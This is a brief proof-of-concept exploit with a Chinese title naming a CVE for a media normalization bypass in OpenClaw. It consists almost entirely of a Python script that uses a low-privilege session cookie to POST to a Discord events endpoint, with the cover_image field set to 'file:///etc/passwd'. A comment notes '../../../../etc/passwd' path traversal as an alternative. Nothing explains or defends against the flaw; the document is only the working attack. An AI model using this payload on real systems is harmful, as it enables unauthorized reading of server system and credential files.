CVE-2026-43532 OpenClaw媒体规范化绕过漏洞

import requests # Target OpenClaw instance URL target_url = "http://vulnerable-host:8080/api/v1/discord/events" # Attacker's session cookie (low privilege required) cookies = { "session": "attacker_low_priv_session_token" } # Malicious payload exploiting the media normalization bypass # Attempting to inject a host-local file reference payload = { "event_name": "Exploit Event", "cover_image": "file:///etc/passwd" # Local file reference # Alternatively, try path traversal: "../../../../../../etc/passwd" } try: response = requests.post(target_url, json=payload, cookies=cookies) if response.status_code == 200: print("[+] Request sent successfully.") print(f"[+] Response: {response.text}") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")